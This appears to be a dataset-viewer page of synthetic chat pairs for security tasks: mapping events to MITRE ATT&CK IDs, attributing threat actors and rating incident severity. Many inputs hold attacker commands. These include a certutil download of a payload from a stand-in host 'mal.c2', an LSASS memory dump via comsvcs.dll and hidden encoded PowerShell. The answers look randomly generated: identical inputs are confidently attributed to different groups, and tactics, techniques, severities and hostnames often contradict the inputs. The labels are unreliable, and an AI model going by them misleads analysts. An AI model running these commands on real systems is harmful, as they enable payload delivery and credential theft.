messages listlengths 2 2 |
|---|
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: For example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.",
"role": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, JA3 Spoof, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-ZCPCEEIB0A)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Privilege Escalation, Defense Evasion, Initial Access",
"role": "use... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-F56FQN967C)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Discovery, Exfiltration",
"role": "user"
},
{
"con... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered S... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-MXMNVSJ6SS)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\":... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1172 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 3384 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.187.50.71",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0010\"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: collect + keychain in same sentence",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1555.001\", \"T1555\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Conficker variants used the Windows AUTORUN feature to spread through USB propagation.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\", \"TA0008\"], \"techniques\": [\"T1091\"]}",
"role": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (AZURE-VM-QBF6V3TCPL)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact, Exfiltration, Collection",
"role": "user"
},
{
"content... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0011\"], \"techn... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.14.176.21",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\"], \"tech... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}",
... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1887 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.9.98.243",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\", \"TA... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2926 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.179.40.202",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Users should also be cautious about the permissions they are granting to apps.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1528\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-6S94W9JGK1)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.137.157.117",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1003.001\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, TLS, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spide... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-I828O6ZECS)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Persistence",
"role": "user"
},
{
"content": "{\"severi... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: It searches the active process list for the systemd process",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1057\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-U55DINL6G0)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration, Privilege Escalation, Command and Control",
"role": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"con... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitor newly executed processes that may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\"], \"techniq... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"confidence\": \"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Monitoring for SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: For early Gazer versions, the compilation timestamp was faked.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.006\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, TLS, Fileless",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"conf... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564\", \"T1564.006\"]}",
"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.55.203.51",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"tec... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.76.94.212",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0001\"], \"technique... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the Native AP... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: jRAT has command line access.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (DB-ORACLE-LR9VSESB66)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may attempt to find group and permission settings.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1069\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-52ULT58AAI)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Defense Evasion, Privilege Escalation",
"role": "u... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.144.99.80",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA00... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-SIC8FOE8MR)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Credential Access, Collection",
"role": "user"
},
{
"content": "{\"... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3163 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, Base64, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"con... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-3VIABMW21C)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": \"Crit... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1220\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1997 C:\\temp\\lsass.dmp full\nEvasion Methods: Fileless, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"FIN7\", \"confidence\":... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may develop exploits that can be used during targeting.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1587\", \"T1587.004\"]}",
"role": "assistant"
}
] |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Octopus can collect information on the Windows directory and searches for compressed RAR files on the host.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",
... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-EPYGMDJFKP)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Exfiltration, Defense Evasion, Collection",
"role": "user"
},
{
... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.1.236.49",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\", \"TA0006\", \"TA0... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-0T79LH77BM)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Persistence",
"role": "user"
},
{
"content": "{\"severity\": ... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 937 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: JA3 Spoof, Base64, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\", ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-E57017DKVR)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"Ext... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3475 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, LOLBin, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\", \"... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.54.51.253",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\", \"TA0001\"], \"technique... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3665 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, LOLBin",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"c... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Proc memory injection involves enumerating the memory of a process via the /proc filesystem (/proc/[pid]) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions.",
"role": "... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 714 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"confid... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2329 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.60.155.244",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-R2G2IZT6M2)\nNetwork Activity: TLSv1.3/TCP to aws.amazon.com\nAttack Tactics: Persistence, Credential Access",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2809 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confid... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: JA3 Spoof, LOLBin, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confi... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-ZC04TKAQRR)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Persistence, Exfiltration, Lateral Movement",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: WMI, Fileless, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Scattered Spider\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-BA9CE8YJJW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Initial Access, Command and Control, Privilege Escalation",
"role": "user"
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3162 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, TLS, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-QLG5UWS0Z1)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution",
"role": "user"
},
{
"content": "{\"severity\": \"Extreme\... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2118 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, TLS, WMI",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confidence\": ... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-ZFTOJGOI7C)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Defense Evasion, Exfiltration, Initial Access",
"role": "user"
},
{
... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1988 C:\\temp\\lsass.dmp full\nEvasion Methods: WMI, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Volt Typhoon\", \"conf... |
[
{
"content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: FIN7 has downloaded additional malware to execute on the victim's machine, including by using a PowerShell script to launch shellcode that retrieves an additional payload.",
"role": "user"
},
{
"content":... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-6FKHXK796W)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Privilege Escalation",
"role": "user"
},
{
"content": "{\"sever... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor for newly constructed BITS tasks to enumerate using the BITSAdmin tool (bitsadmin /list /allusers /verbose).",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0005\"], \"techniques\": [\"... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-9G1XM8PB4X)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration",
"role": "user"
},
{
"content": "{\"severity\": \"High... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2625 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.177.21.133",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\", \"TA0006\"], \"t... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, WMI, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"UNC4841\", \"conf... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1155 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"APT41\", \"confiden... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2372 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, Fileless, JA3 Spoof",
"role": "user"
},
{
"content": "{\"actor\": \"Mustang Panda\... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-I9HBIMT5WI)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{\"severity\": \"C... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.122.213.46",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"c... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-HFSDMSDDAP)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Initial Access",
"role": "user"
},
{
"content": "{... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-UAM2I1ZVJ7)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Impact",
"role": "user"
},
{
"content": "{\"severity\": \"High... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, WMI, Base64",
"role": "user"
},
{
"content": "{\"actor\": \"APT29\", \"conf... |
[
{
"content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Monitor for the execution of commands that could modify the code signing policy of a system, such as bcdedit.exe -set TESTSIGNING ON.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techni... |
[
{
"content": "Identify the ATT&CK IDs present in the report below.\n\nInput: MOTW is a NTFS feature and many container files do not support NTFS alternative data streams.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1553\", \"T1553.005\"]}",
"role": "assistan... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: KOCTOPUS has used -WindowsStyle Hidden to hide the command window.",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1564.003\", \"T1564\"]}",
"role": "assistant"
}
] |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-LO056S2VEY)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control",
"role": "user"
},
{
"content": "{\"se... |
[
{
"content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, Base64, TLS",
"role": "user"
},
{
"content": "{\"actor\": \"Lapsus$\", \"confidence\": \"High\"}"... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Screenshots The data dump includes several screenshots of resources that the leaker alleged was related to the OilRig group",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1113... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.72.129.60",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.00... |
[
{
"content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.135.115.121",
"role": "user"
},
{
"content": "{\"tactics\":... |
[
{
"content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.21.117.50",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0006\", \"TA0004\", \"TA0007\"]... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-PXAEV7MGDF)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Initial Access, Credential Access, Privilege Escalation",
"role": "user"
},
... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: At this point the process can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.",
"role"... |
[
{
"content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.47.105.121",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0010\", \"TA0005\"], ... |
[
{
"content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager",
"role": "user"
},
{
"content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}",
"role": "assis... |
[
{
"content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (IAM-ROLE-XDOOSQCLXN)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Discovery, Lateral Movement, Reconnaissance",
"role": "user"
},
{
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.